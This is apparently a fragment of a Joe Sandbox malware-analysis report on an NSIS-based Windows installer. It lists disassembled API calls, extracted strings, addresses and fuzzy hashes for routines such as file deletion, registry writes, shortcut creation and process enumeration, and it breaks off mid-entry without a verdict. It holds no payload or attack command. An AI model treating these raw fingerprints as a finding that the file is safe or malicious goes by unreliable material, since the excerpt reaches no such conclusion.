                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                    • String ID: 82D$@%F$@rD$A
                                                                                                    • API String ID: 3347642858-1086125096
                                                                                                    • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                    • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                    • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                                                                                    • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                    • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                    Strings
                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                    • \*.*, xrefs: 00406D03
                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                    • API String ID: 2035342205-3294556389
                                                                                                    • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                                                    • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                    • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                                                    • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                    • API String ID: 3581403547-784952888
                                                                                                    • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                    • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                    Strings
                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                    Similarity
                                                                                                    • API ID: CreateInstance
                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                    • API String ID: 542301482-1377821865
                                                                                                    • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                    • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                    • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                    • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 1974802433-0
                                                                                                    • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                                                    • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                    • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                                                    • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                    • API String ID: 20674999-2124804629
                                                                                                    • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                    • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                    • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                    • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                    • ShowWindow.USER32(?), ref: 004054D2
                                                                                                    • DestroyWindow.USER32 ref: 004054E6
                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                    • EnableWindow.USER32(?,?), ref: 0040573C
                                                                                                    • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                    Similarity
                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                    • String ID: @rD
                                                                                                    • API String ID: 184305955-3814967855
                                                                                                    • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                    • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                    • GetSysColor.USER32(?), ref: 004041AF
                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                    • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                    • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                    • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                    • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                    • String ID: @%F$N$open
                                                                                                    • API String ID: 3928313111-3849437375
                                                                                                    • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                    • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                    • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                    • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                    APIs
                                                                                                    • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                    • wsprintfA.USER32 ref: 00406B4D
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                    • String ID: F$%s=%s$NUL$[Rename]
                                                                                                    • API String ID: 565278875-1653569448
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                    • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: F
                                                                                                    • API String ID: 941294808-1304234792
                                                                                                    APIs
                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                    • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                    • API String ID: 1641139501-220328614
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                    Strings
                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                    • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                    • API String ID: 3734993849-2769509956
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                    • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                    • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                    Strings
                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                    • API String ID: 1033533793-945480824
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                    • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2740478559-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                      • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                      • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                    Strings
                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                    Similarity
